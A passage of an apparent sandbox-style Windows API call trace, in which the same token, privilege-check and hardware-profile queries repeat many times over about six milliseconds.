pHWProfileInfo=0x0) returned 0x3 [0017.023] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.023] GetCurrentThread () returned 0xfffffffe [0017.023] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.023] GetLastError () returned 0x3f0 [0017.023] GetCurrentProcess () returned 0xffffffff [0017.023] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.023] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.023] SetLastError (dwErrCode=0x522) [0017.023] CloseHandle (hObject=0x114) returned 1 [0017.023] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.023] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.023] GetLastError () returned 0x578 [0017.023] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.023] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.023] GetCurrentThread () returned 0xfffffffe [0017.023] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.023] GetLastError () returned 0x3f0 [0017.023] GetCurrentProcess () returned 0xffffffff [0017.023] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.023] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.023] SetLastError (dwErrCode=0x522) [0017.023] CloseHandle (hObject=0x114) returned 1 [0017.023] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.023] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.023] GetLastError () returned 0x578 [0017.023] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.023] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.023] GetCurrentThread () returned 0xfffffffe [0017.023] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.023] GetLastError () returned 0x3f0 [0017.023] GetCurrentProcess () returned 0xffffffff [0017.023] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.023] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.023] SetLastError (dwErrCode=0x522) [0017.023] CloseHandle (hObject=0x114) returned 1 [0017.023] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.023] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.023] GetLastError () returned 0x578 [0017.023] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.023] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.023] GetCurrentThread () returned 0xfffffffe [0017.023] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.024] GetLastError () returned 0x3f0 [0017.024] GetCurrentProcess () returned 0xffffffff [0017.024] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.024] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.024] SetLastError (dwErrCode=0x522) [0017.024] CloseHandle (hObject=0x114) returned 1 [0017.024] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.024] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.024] GetLastError () returned 0x578 [0017.024] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.024] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.024] GetCurrentThread () returned 0xfffffffe [0017.024] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.024] GetLastError () returned 0x3f0 [0017.024] GetCurrentProcess () returned 0xffffffff [0017.024] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.024] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.024] SetLastError (dwErrCode=0x522) [0017.024] CloseHandle (hObject=0x114) returned 1 [0017.024] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.024] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.024] GetLastError () returned 0x578 [0017.024] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.024] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.024] GetCurrentThread () returned 0xfffffffe [0017.024] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.024] GetLastError () returned 0x3f0 [0017.024] GetCurrentProcess () returned 0xffffffff [0017.024] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.024] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.024] SetLastError (dwErrCode=0x522) [0017.024] CloseHandle (hObject=0x114) returned 1 [0017.024] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.024] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.024] GetLastError () returned 0x578 [0017.024] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.024] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.024] GetCurrentThread () returned 0xfffffffe [0017.024] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.024] GetLastError () returned 0x3f0 [0017.024] GetCurrentProcess () returned 0xffffffff [0017.024] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.024] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.024] SetLastError (dwErrCode=0x522) [0017.025] CloseHandle (hObject=0x114) returned 1 [0017.025] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.025] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.025] GetLastError () returned 0x578 [0017.025] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.025] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.025] GetCurrentThread () returned 0xfffffffe [0017.025] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.025] GetLastError () returned 0x3f0 [0017.025] GetCurrentProcess () returned 0xffffffff [0017.025] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.025] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.025] SetLastError (dwErrCode=0x522) [0017.025] CloseHandle (hObject=0x114) returned 1 [0017.025] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.025] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.025] GetLastError () returned 0x578 [0017.025] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.025] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.025] GetCurrentThread () returned 0xfffffffe [0017.025] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.025] GetLastError () returned 0x3f0 [0017.025] GetCurrentProcess () returned 0xffffffff [0017.025] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.025] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.025] SetLastError (dwErrCode=0x522) [0017.025] CloseHandle (hObject=0x114) returned 1 [0017.025] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.025] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.025] GetLastError () returned 0x578 [0017.025] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.025] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.025] GetCurrentThread () returned 0xfffffffe [0017.025] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.025] GetLastError () returned 0x3f0 [0017.025] GetCurrentProcess () returned 0xffffffff [0017.025] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.025] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.025] SetLastError (dwErrCode=0x522) [0017.025] CloseHandle (hObject=0x114) returned 1 [0017.025] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.025] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.025] GetLastError () returned 0x578 [0017.025] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.025] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.026] GetCurrentThread () returned 0xfffffffe [0017.026] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.026] GetLastError () returned 0x3f0 [0017.026] GetCurrentProcess () returned 0xffffffff [0017.026] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.026] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.026] SetLastError (dwErrCode=0x522) [0017.026] CloseHandle (hObject=0x114) returned 1 [0017.026] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.026] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.026] GetLastError () returned 0x578 [0017.026] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.026] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.026] GetCurrentThread () returned 0xfffffffe [0017.026] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.026] GetLastError () returned 0x3f0 [0017.026] GetCurrentProcess () returned 0xffffffff [0017.026] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.026] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.026] SetLastError (dwErrCode=0x522) [0017.026] CloseHandle (hObject=0x114) returned 1 [0017.026] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.026] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.026] GetLastError () returned 0x578 [0017.026] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.026] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.026] GetCurrentThread () returned 0xfffffffe [0017.026] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.026] GetLastError () returned 0x3f0 [0017.026] GetCurrentProcess () returned 0xffffffff [0017.026] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.026] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.026] SetLastError (dwErrCode=0x522) [0017.026] CloseHandle (hObject=0x114) returned 1 [0017.026] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.026] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.026] GetLastError () returned 0x578 [0017.026] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.026] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.026] GetCurrentThread () returned 0xfffffffe [0017.026] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.026] GetLastError () returned 0x3f0 [0017.026] GetCurrentProcess () returned 0xffffffff [0017.026] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.027] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.027] SetLastError (dwErrCode=0x522) [0017.027] CloseHandle (hObject=0x114) returned 1 [0017.027] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.027] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.027] GetLastError () returned 0x578 [0017.027] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.027] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.027] GetCurrentThread () returned 0xfffffffe [0017.027] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.027] GetLastError () returned 0x3f0 [0017.027] GetCurrentProcess () returned 0xffffffff [0017.027] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.027] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.027] SetLastError (dwErrCode=0x522) [0017.027] CloseHandle (hObject=0x114) returned 1 [0017.027] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.027] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.027] GetLastError () returned 0x578 [0017.027] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.027] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.027] GetCurrentThread () returned 0xfffffffe [0017.027] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.027] GetLastError () returned 0x3f0 [0017.027] GetCurrentProcess () returned 0xffffffff [0017.027] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.027] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.027] SetLastError (dwErrCode=0x522) [0017.027] CloseHandle (hObject=0x114) returned 1 [0017.027] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.027] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.027] GetLastError () returned 0x578 [0017.027] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.027] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.027] GetCurrentThread () returned 0xfffffffe [0017.027] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.027] GetLastError () returned 0x3f0 [0017.027] GetCurrentProcess () returned 0xffffffff [0017.027] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.027] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.027] SetLastError (dwErrCode=0x522) [0017.027] CloseHandle (hObject=0x114) returned 1 [0017.027] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.028] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.028] GetLastError () returned 0x578 [0017.028] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.028] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.028] GetCurrentThread () returned 0xfffffffe [0017.028] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.028] GetLastError () returned 0x3f0 [0017.028] GetCurrentProcess () returned 0xffffffff [0017.028] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.028] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.028] SetLastError (dwErrCode=0x522) [0017.028] CloseHandle (hObject=0x114) returned 1 [0017.028] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.028] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.028] GetLastError () returned 0x578 [0017.028] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.028] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.028] GetCurrentThread () returned 0xfffffffe [0017.028] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.028] GetLastError () returned 0x3f0 [0017.028] GetCurrentProcess () returned 0xffffffff [0017.028] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.028] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.028] SetLastError (dwErrCode=0x522) [0017.028] CloseHandle (hObject=0x114) returned 1 [0017.028] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.028] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.028] GetLastError () returned 0x578 [0017.028] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.028] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.028] GetCurrentThread () returned 0xfffffffe [0017.028] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.028] GetLastError () returned 0x3f0 [0017.028] GetCurrentProcess () returned 0xffffffff [0017.028] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.028] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.028] SetLastError (dwErrCode=0x522) [0017.028] CloseHandle (hObject=0x114) returned 1 [0017.028] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.028] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.028] GetLastError () returned 0x578 [0017.028] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.028] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.028] GetCurrentThread () returned 0xfffffffe [0017.028] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.029] GetLastError () returned 0x3f0 [0017.029] GetCurrentProcess () returned 0xffffffff [0017.029] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.029] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.029] SetLastError (dwErrCode=0x522) [0017.029] CloseHandle (hObject=0x114) returned 1 [0017.029] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.029] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.029] GetLastError () returned 0x578 [0017.029] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.029] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.029] GetCurrentThread () returned 0xfffffffe [0017.029] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.029] GetLastError () returned 0x3f0 [0017.029] GetCurrentProcess () returned 0xffffffff [0017.029] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.029] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.029] SetLastError (dwErrCode=0x522) [0017.029] CloseHandle (hObject=0x114) returned 1 [0017.029] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.029] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.029] GetLastError () returned 0x578 [0017.029] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, 